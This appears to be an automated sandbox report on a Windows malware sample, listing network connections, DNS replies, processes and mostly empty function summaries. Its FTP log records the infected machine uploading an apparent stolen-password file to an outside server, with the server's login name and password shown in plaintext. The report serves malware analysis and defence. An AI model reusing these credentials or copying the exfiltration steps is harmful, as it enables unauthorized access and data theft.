Nov 9, 2024 20:47:10.176876068 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.190601110 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.190615892 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.190671921 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.190676928 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.190722942 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.191792011 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.191807032 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.191867113 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.191873074 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.191915989 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.193341017 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.193355083 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.193408966 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.193413973 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.193435907 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.193450928 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.194552898 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.194566011 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.194602013 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.194607019 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.194641113 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.194663048 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.195895910 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.195909977 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.195966005 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.195971966 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.196008921 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.197513103 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.197526932 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.197577953 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.197583914 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.197619915 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.293560982 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.293576002 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.293667078 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.293675900 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.293719053 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.320646048 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.320662022 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.320754051 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.320763111 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.320806980 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.321789980 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.321827888 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.321852922 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.321855068 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:10.321882010 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.321899891 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.321973085 CET | 49803 | 443 | 192.168.2.4 | 185.36.171.17 |
Nov 9, 2024 20:47:10.321985006 CET | 443 | 49803 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:11.371166945 CET | 49819 | 21 | 192.168.2.4 | 86.107.36.93 |
Nov 9, 2024 20:47:11.375993967 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:11.376101971 CET | 49819 | 21 | 192.168.2.4 | 86.107.36.93 |
Nov 9, 2024 20:47:12.126977921 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:12.127192020 CET | 49819 | 21 | 192.168.2.4 | 86.107.36.93 |
Nov 9, 2024 20:47:12.132014036 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:12.387361050 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:12.389625072 CET | 49819 | 21 | 192.168.2.4 | 86.107.36.93 |
Nov 9, 2024 20:47:12.394354105 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:12.713813066 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:12.714898109 CET | 49819 | 21 | 192.168.2.4 | 86.107.36.93 |
Nov 9, 2024 20:47:12.719691992 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:12.975193977 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:12.975423098 CET | 49819 | 21 | 192.168.2.4 | 86.107.36.93 |
Nov 9, 2024 20:47:12.980310917 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:13.235774040 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:13.235918045 CET | 49819 | 21 | 192.168.2.4 | 86.107.36.93 |
Nov 9, 2024 20:47:13.240782022 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:13.496486902 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:13.496649027 CET | 49819 | 21 | 192.168.2.4 | 86.107.36.93 |
Nov 9, 2024 20:47:13.501627922 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:13.757342100 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:13.758055925 CET | 49835 | 35643 | 192.168.2.4 | 86.107.36.93 |
Nov 9, 2024 20:47:13.762873888 CET | 35643 | 49835 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:13.762938023 CET | 49835 | 35643 | 192.168.2.4 | 86.107.36.93 |
Nov 9, 2024 20:47:13.762980938 CET | 49819 | 21 | 192.168.2.4 | 86.107.36.93 |
Nov 9, 2024 20:47:13.767704010 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:14.514755964 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:14.515002966 CET | 49835 | 35643 | 192.168.2.4 | 86.107.36.93 |
Nov 9, 2024 20:47:14.515065908 CET | 49835 | 35643 | 192.168.2.4 | 86.107.36.93 |
Nov 9, 2024 20:47:14.519773006 CET | 35643 | 49835 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:14.520247936 CET | 35643 | 49835 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:14.520298958 CET | 49835 | 35643 | 192.168.2.4 | 86.107.36.93 |
Nov 9, 2024 20:47:14.569473982 CET | 49819 | 21 | 192.168.2.4 | 86.107.36.93 |
Nov 9, 2024 20:47:14.776060104 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 |
Nov 9, 2024 20:47:14.819468021 CET | 49819 | 21 | 192.168.2.4 | 86.107.36.93 |
Nov 9, 2024 20:47:19.172878027 CET | 80 | 49797 | 185.36.171.17 | 192.168.2.4 |
Nov 9, 2024 20:47:19.172935963 CET | 49797 | 80 | 192.168.2.4 | 185.36.171.17 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 9, 2024 20:47:06.957176924 CET | 52403 | 53 | 192.168.2.4 | 1.1.1.1 |
Nov 9, 2024 20:47:07.004362106 CET | 53 | 52403 | 1.1.1.1 | 192.168.2.4 |
Nov 9, 2024 20:47:11.266045094 CET | 58890 | 53 | 192.168.2.4 | 1.1.1.1 |
Nov 9, 2024 20:47:11.367460966 CET | 53 | 58890 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Nov 9, 2024 20:47:06.957176924 CET | 192.168.2.4 | 1.1.1.1 | 0xf12d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 20:47:11.266045094 CET | 192.168.2.4 | 1.1.1.1 | 0x3d45 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Nov 9, 2024 20:47:07.004362106 CET | 1.1.1.1 | 192.168.2.4 | 0xf12d | No error (0) | 185.36.171.17 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 20:47:11.367460966 CET | 1.1.1.1 | 192.168.2.4 | 0x3d45 | No error (0) | 86.107.36.93 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49797 | 185.36.171.17 | 80 | 600 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Nov 9, 2024 20:47:07.016972065 CET | 168 | OUT | |
Nov 9, 2024 20:47:08.054354906 CET | 1031 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49803 | 185.36.171.17 | 443 | 600 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-11-09 19:47:09 UTC | 192 | OUT | |
2024-11-09 19:47:09 UTC | 496 | IN | |
2024-11-09 19:47:09 UTC | 872 | IN | |
2024-11-09 19:47:09 UTC | 14987 | IN | |
2024-11-09 19:47:09 UTC | 16384 | IN | |
2024-11-09 19:47:10 UTC | 16384 | IN | |
2024-11-09 19:47:10 UTC | 16384 | IN | |
2024-11-09 19:47:10 UTC | 16384 | IN | |
2024-11-09 19:47:10 UTC | 16384 | IN | |
2024-11-09 19:47:10 UTC | 16384 | IN | |
2024-11-09 19:47:10 UTC | 16384 | IN | |
2024-11-09 19:47:10 UTC | 16384 | IN |
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
Nov 9, 2024 20:47:12.126977921 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity. |
Nov 9, 2024 20:47:12.127192020 CET | 49819 | 21 | 192.168.2.4 | 86.107.36.93 | USER server@carbognin.it |
Nov 9, 2024 20:47:12.387361050 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 | 331 User server@carbognin.it OK. Password required |
Nov 9, 2024 20:47:12.389625072 CET | 49819 | 21 | 192.168.2.4 | 86.107.36.93 | PASS 59Cif8wZUH#X |
Nov 9, 2024 20:47:12.713813066 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 | 230 OK. Current restricted directory is / |
Nov 9, 2024 20:47:12.975193977 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 | 504 Unknown command |
Nov 9, 2024 20:47:12.975423098 CET | 49819 | 21 | 192.168.2.4 | 86.107.36.93 | PWD |
Nov 9, 2024 20:47:13.235774040 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 | 257 "/" is your current location |
Nov 9, 2024 20:47:13.235918045 CET | 49819 | 21 | 192.168.2.4 | 86.107.36.93 | TYPE I |
Nov 9, 2024 20:47:13.496486902 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 | 200 TYPE is now 8-bit binary |
Nov 9, 2024 20:47:13.496649027 CET | 49819 | 21 | 192.168.2.4 | 86.107.36.93 | PASV |
Nov 9, 2024 20:47:13.757342100 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 | 227 Entering Passive Mode (86,107,36,93,139,59) |
Nov 9, 2024 20:47:13.762980938 CET | 49819 | 21 | 192.168.2.4 | 86.107.36.93 | STOR PW_user-114127_2024_11_09_14_47_10.html |
Nov 9, 2024 20:47:14.514755964 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 | 150 Accepted data connection |
Nov 9, 2024 20:47:14.776060104 CET | 21 | 49819 | 86.107.36.93 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.261 seconds (measured here), 1.19 Kbytes per second |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 14:45:51 |
Start date: | 09/11/2024 |
Path: | C:\Users\user\Desktop\Amalgamers.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 942'432 bytes |
MD5 hash: | E2A5B947AC8266E79CC0C9FAFF051849 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 1 |
Start time: | 14:45:52 |
Start date: | 09/11/2024 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1e0000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 14:45:52 |
Start date: | 09/11/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 14:46:49 |
Start date: | 09/11/2024 |
Path: | C:\Windows\SysWOW64\msiexec.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x7ff72bec0000 |
File size: | 59'904 bytes |
MD5 hash: | 9D09DC1EDA745A5F87553048E57620CF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | false |
Execution Graph
Execution Coverage: | 22.2% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 21.4% |
Total number of Nodes: | 1270 |
Total number of Limit Nodes: | 27 |
Graph
Function 0040320C Relevance: 93.1, APIs: 32, Strings: 21, Instructions: 366stringcomfileCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405205 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004062A3 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403B6B Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004037CE Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405FC2 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 199stringCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004050C7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004062CA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040563F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405B39 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405B14 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040560A Relevance: 3.0, APIs: 2, Instructions: 9COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405BE0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405BB1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040408B Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404074 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004031C4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404061 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404A44 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004044D1 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405768 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004026FE Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040677D Relevance: .3, Instructions: 334COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406F54 Relevance: .3, Instructions: 300COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004041AA Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405C0F Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004040A6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404992 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402C7C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404888 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402003 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401D9B Relevance: 7.5, APIs: 5, Instructions: 43COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405938 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402CFF Relevance: 6.0, APIs: 4, Instructions: 33COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405A26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040503B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405E87 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040597F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405A9E Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02CC4A58 Relevance: .3, Instructions: 266COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02CC92F0 Relevance: .1, Instructions: 78COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02CC6E9A Relevance: 2.6, Strings: 2, Instructions: 147COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02CCF38D Relevance: 1.4, Strings: 1, Instructions: 114COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02CC6F38 Relevance: 1.4, Strings: 1, Instructions: 101COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02CC7998 Relevance: .6, Instructions: 555COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02CC93F4 Relevance: .4, Instructions: 375COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02CC9770 Relevance: .3, Instructions: 281COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02CC4A4D Relevance: .3, Instructions: 263COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02CC1838 Relevance: .1, Instructions: 100COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02CCF250 Relevance: .1, Instructions: 95COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02CC269D Relevance: .1, Instructions: 95COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02CCF260 Relevance: .1, Instructions: 91COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02CC26A8 Relevance: .1, Instructions: 90COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02CC7051 Relevance: .1, Instructions: 86COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02CC92E1 Relevance: .1, Instructions: 81COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02CC1340 Relevance: .1, Instructions: 79COMMON
Memory Dump Source |
|
